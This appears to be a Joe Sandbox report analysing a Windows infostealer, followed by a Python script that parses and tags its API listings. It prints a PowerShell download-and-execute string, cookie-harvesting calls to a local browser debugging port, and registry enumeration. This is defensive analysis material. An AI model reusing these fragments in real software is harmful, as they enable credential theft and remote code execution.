                              • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00E4BF66
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4BF88
                              • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00E4BF94
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4BFBA
                              • ShellExecuteEx.SHELL32(?), ref: 00E4C00C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 4016326548-898575020
                              • Opcode ID: 95aec44b8a3260ab25d4debc6e9e222a6bf4205f50aff3ea93ccccce5f0d8dde
                              • Instruction ID: 1aa385951e2841fdab0a3336fb1b540303ddc38fea79dbcc09ec591990a5129b
                              • Opcode Fuzzy Hash: 95aec44b8a3260ab25d4debc6e9e222a6bf4205f50aff3ea93ccccce5f0d8dde
                              • Instruction Fuzzy Hash: E461B371A103099FCB21AFB5AC8D6AE7BF8AF44308F146429F685F7241DB35D905CB91
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E5184F
                              • lstrlen.KERNEL32(00D16EC8), ref: 00E51860
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51887
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E51892
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E518C1
                              • lstrlen.KERNEL32(00E64FA0), ref: 00E518D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E518F4
                              • lstrcat.KERNEL32(00000000,00E64FA0), ref: 00E51900
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5192F
                              • lstrlen.KERNEL32(00D16EE8), ref: 00E51945
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5196C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E51977
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E519A6
                              • lstrlen.KERNEL32(00E64FA0), ref: 00E519B8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E519D9
                              • lstrcat.KERNEL32(00000000,00E64FA0), ref: 00E519E5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51A14
                              • lstrlen.KERNEL32(00D16F08), ref: 00E51A2A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51A51
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E51A5C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51A8B
                              • lstrlen.KERNEL32(00D16F28), ref: 00E51AA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51AC8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E51AD3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51B02
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen
                              • String ID:
                              • API String ID: 1049500425-0
                              • Opcode ID: 1839b859c7691780776eb4f538b3ea4837e6610bc73a0ca8dd38ddcf0324273a
                              • Instruction ID: d10e2ce540791c019c4001ec583c5b072ac0fcc0a5cd93aca308b343a28dec77
                              • Opcode Fuzzy Hash: 1839b859c7691780776eb4f538b3ea4837e6610bc73a0ca8dd38ddcf0324273a
                              • Instruction Fuzzy Hash: 2D915E70600302DFDB30AFB9D888B1677E8AF44309F14A86DE9C6E7255DB39D845CB60
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E44793
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00E447C5
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E44812
                              • lstrlen.KERNEL32(00E64B60), ref: 00E4481D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4483A
                              • lstrcat.KERNEL32(00000000,00E64B60), ref: 00E44846
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4486B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44898
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E448A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E448CA
                              • StrStrA.SHLWAPI(?,00000000), ref: 00E448DC
                              • lstrlen.KERNEL32(?), ref: 00E448F0
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E44931
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E449B8
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E449E1
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E44A0A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E44A30
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E44A5D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 4107348322-3310892237
                              • Opcode ID: ef3f848419894c1ed304fce74a6ccf2ede0b4272a80853c99fdca937143ce35c
                              • Instruction ID: 6c34fbf7e0c39bd7a050fbbb881c3453dcbeb3b6dbdb81d0dc6d8c1576c7dceb
                              • Opcode Fuzzy Hash: ef3f848419894c1ed304fce74a6ccf2ede0b4272a80853c99fdca937143ce35c
                              • Instruction Fuzzy Hash: CAB1A0B1A103069FCB21EF78E849A9E7BF5AF44304F156428FA85B7251DB34ED05CB90
                              APIs
                                • Part of subcall function 00E390C0: InternetOpenA.WININET(00E5CFEC,00000001,00000000,00000000,00000000), ref: 00E390DF
                                • Part of subcall function 00E390C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E390FC
                                • Part of subcall function 00E390C0: InternetCloseHandle.WININET(00000000), ref: 00E39109
                              • strlen.MSVCRT ref: 00E392E1
                              • strlen.MSVCRT ref: 00E392FA
                                • Part of subcall function 00E38980: std::_Xinvalid_argument.LIBCPMT ref: 00E38996
                              • strlen.MSVCRT ref: 00E39399
                              • strlen.MSVCRT ref: 00E393E6
                              • lstrcat.KERNEL32(?,cookies), ref: 00E39547
                              • lstrcat.KERNEL32(?,00E61794), ref: 00E39559
                              • lstrcat.KERNEL32(?,?), ref: 00E3956A
                              • lstrcat.KERNEL32(?,00E64B98), ref: 00E3957C
                              • lstrcat.KERNEL32(?,?), ref: 00E3958D
                              • lstrcat.KERNEL32(?,.txt), ref: 00E3959F
                              • lstrlen.KERNEL32(?), ref: 00E395B6
                              • lstrlen.KERNEL32(?), ref: 00E395DB
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E39614
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                              • API String ID: 1201316467-3542011879
                              • Opcode ID: 9748f7415240f6c5fee6ad6b97b769a356a31b09a55ebd32bdb930573688ee64
                              • Instruction ID: 99d0aa6ae4e4442e6faef56a56fc77f2c206b4d994d615a15d9c87defd036c4e
                              • Opcode Fuzzy Hash: 9748f7415240f6c5fee6ad6b97b769a356a31b09a55ebd32bdb930573688ee64
                              • Instruction Fuzzy Hash: DEE13371E00218EFDF14DFA8D885ADEBBF5AF48300F1054A9E549B7282DB75AE45CB90
                              APIs
                              • memset.MSVCRT ref: 00E4D9A1
                              • memset.MSVCRT ref: 00E4D9B3
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4D9DB
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4DA0E
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4DA1C
                              • lstrcat.KERNEL32(?,00D2F320), ref: 00E4DA36
                              • lstrcat.KERNEL32(?,?), ref: 00E4DA4A
                              • lstrcat.KERNEL32(?,00D2E030), ref: 00E4DA5E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4DA8E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E4DA95
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4DAFE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2367105040-0
                              • Opcode ID: 63b5be8cddb29464073e191612452096db07b72c2337161fe7d9a278e6767bea
                              • Instruction ID: 56a383affb452af5759f2b25b6040c0e1e1cb94e4be2d657046d12ea06a1339b
                              • Opcode Fuzzy Hash: 63b5be8cddb29464073e191612452096db07b72c2337161fe7d9a278e6767bea
                              • Instruction Fuzzy Hash: 4CB1B2719102199FDB20EFA4DC889EEBBB8EF48304F145969FA45F7241DB359E44CB50
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3B330
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B37E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B3A9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3B3B1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B3D9
                              • lstrlen.KERNEL32(00E64C50), ref: 00E3B450
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B474
                              • lstrcat.KERNEL32(00000000,00E64C50), ref: 00E3B480
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B4A9
                              • lstrlen.KERNEL32(00000000), ref: 00E3B52D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B557
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3B55F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B587
                              • lstrlen.KERNEL32(00E64AD4), ref: 00E3B5FE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B622
                              • lstrcat.KERNEL32(00000000,00E64AD4), ref: 00E3B62E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B65E
                              • lstrlen.KERNEL32(?), ref: 00E3B767
                              • lstrlen.KERNEL32(?), ref: 00E3B776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B79E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: ab8a6048be784a768384a5323a4d6e1be4a53aedcc964e9475cd77d21cd6a1b1
                              • Instruction ID: 1053b2debfb1c6af6e776dc09c760051a031ea8e284faa0b80f850782b120257
                              • Opcode Fuzzy Hash: ab8a6048be784a768384a5323a4d6e1be4a53aedcc964e9475cd77d21cd6a1b1
                              • Instruction Fuzzy Hash: C3025270A01205CFCB25DF64D58DB6ABFF5AF44308F19906DE64AAB262D776DC42CB80
                              APIs
                                • Part of subcall function 00E571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E571FE
                              • RegOpenKeyExA.ADVAPI32(?,00D2C260,00000000,00020019,?), ref: 00E537BD
                              • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00E537F7
                              • wsprintfA.USER32 ref: 00E53822
                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00E53840
                              • RegCloseKey.ADVAPI32(?), ref: 00E5384E
                              • RegCloseKey.ADVAPI32(?), ref: 00E53858
                              • RegQueryValueExA.ADVAPI32(?,00D2F7B8,00000000,000F003F,?,?), ref: 00E538A1
                              • lstrlen.KERNEL32(?), ref: 00E538B6
                              • RegQueryValueExA.ADVAPI32(?,00D2F800,00000000,000F003F,?,00000400), ref: 00E53927
                              • RegCloseKey.ADVAPI32(?), ref: 00E53972
                              • RegCloseKey.ADVAPI32(?), ref: 00E53989
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 13140697-3278919252
                              • Opcode ID: c7746a885125278c2bcebb7bf5540ee50af0d0ff6c01311dac4210fec40c9d68
                              • Instruction ID: 0d09a9d9b906e4bd253b43723a6f009e3bc91a92bf2e0672ecfaeebc13c1414e
                              • Opcode Fuzzy Hash: c7746a885125278c2bcebb7bf5540ee50af0d0ff6c01311dac4210fec40c9d68
                              • Instruction Fuzzy Hash: CD91C1B2900208DFCB20DFA4D9849DEB7B8FB88315F149969FA09B7215D7369E45CF90
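The per-function tables on this page are what Joe Sandbox emits for every analysed function, and seven of them in the same format are slow to read by eye. The block below is an added example, not code from the report or from the sample: it parses exactly this line format (direct calls, bare calls without an argument list such as wsprintfA.USER32, and "Part of subcall function" entries), decodes the two SDK constants worth knowing here (nFolder 0000001A passed to SHGetFolderPathA is CSIDL_APPDATA; samDesired 00020019 passed to RegOpenKeyExA is KEY_READ), and tags each block by the API combination it shows: the loopback http://localhost:9229/json fetch at 00E390FC, the AppData path existence check at 00E4D9DB, the registry subkey walk at 00E537BD, the GetModuleFileNameA/ShellExecuteEx/ExitProcess relaunch at 00E516A1, and the long lstrcpy/lstrcat/lstrlen chains. The tag names and the lstr* threshold are this example's own choices; the sample input consists of trimmed copies of listing lines from the blocks on this page.

```python
"""Parse the per-function 'APIs' listings Joe Sandbox renders (the format used
throughout this report) and tag each block with the behaviour it shows."""
import re
from collections import namedtuple

# A listing line: "• api.MODULE(arg,arg), ref: ADDR" or "• api.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR:" (all three shapes appear in this report).
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<module>\w+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
LOCALHOST_JSON = re.compile(r"^https?://(localhost|127\.0\.0\.1):\d+/json")
CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA"}  # SHGetFolderPath nFolder values
REG_ACCESS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}  # samDesired

Call = namedtuple("Call", "api module args ref subcall_of")

def parse_calls(block: str) -> list[Call]:
    """Listing lines -> Call records; header lines such as 'Strings' simply do not match."""
    calls = []
    for line in block.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["api"], m["module"], args, m["ref"].upper(), m["sub"] or ""))
    return calls

def split_blocks(report_text: str) -> list[str]:
    """Every function listing in the report opens with a bare 'APIs' header line."""
    return [p for p in re.split(r"^\s*APIs\s*$", report_text, flags=re.M) if p.strip()]

def decode_constants(call: Call) -> list[str]:
    """Name the numeric arguments a reviewer would otherwise look up in the SDK headers."""
    def hexarg(i: int):
        try:
            return int(call.args[i], 16)
        except (IndexError, ValueError):
            return None
    names = []
    if call.api == "SHGetFolderPathA" and hexarg(1) in CSIDL:
        names.append(CSIDL[hexarg(1)])
    if call.api == "RegOpenKeyExA" and hexarg(3) in REG_ACCESS:
        names.append(REG_ACCESS[hexarg(3)])
    return names

def classify(calls: list[Call]) -> set[str]:
    """Tag a block by API combinations; sub-call entries count. Tag names/threshold are ours."""
    apis = {c.api for c in calls}
    tags = set()
    if any(c.api.startswith("InternetOpenUrl") and any(LOCALHOST_JSON.match(a) for a in c.args)
           for c in calls):
        tags.add("devtools_endpoint_probe")  # fetches the /json target list on a loopback port
    if {"SHGetFolderPathA", "GetFileAttributesA"} <= apis:
        tags.add("appdata_path_probe")  # builds a per-user path, then tests that it exists
    if {"RegOpenKeyExA", "RegEnumKeyExA", "RegQueryValueExA"} <= apis:
        tags.add("registry_subkey_walk")  # enumerates subkeys and reads values from each
    if {"GetModuleFileNameA", "ShellExecuteEx", "ExitProcess"} <= apis:
        tags.add("self_relaunch")  # re-executes its own image, then exits
    lstr = sum(c.api in ("lstrcpy", "lstrcat", "lstrlen") for c in calls)
    if lstr >= 6 and lstr >= 0.8 * len(calls):
        tags.add("runtime_string_assembly")  # long lstr* chains with almost nothing else
    return tags

def analyse(report_text: str) -> dict[str, set[str]]:
    """Key each block by the ref address of its first direct (non-subcall) call."""
    out = {}
    for block in split_blocks(report_text):
        calls = parse_calls(block)
        if calls:
            key = next((c.ref for c in calls if not c.subcall_of), calls[0].ref)
            out[key] = classify(calls)
    return out

# Listing lines copied from the function blocks in this report (trimmed, not constructed).
SAMPLE = """
APIs
• InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E390FC
• InternetReadFile.WININET(00000000,?,00001000,?), ref: 00E39197
  • Part of subcall function 00E38980: std::_Xinvalid_argument.LIBCPMT ref: 00E38996
APIs
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4D9DB
• GetFileAttributesA.KERNEL32(00000000), ref: 00E4DA95
APIs
  • Part of subcall function 00E571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E571FE
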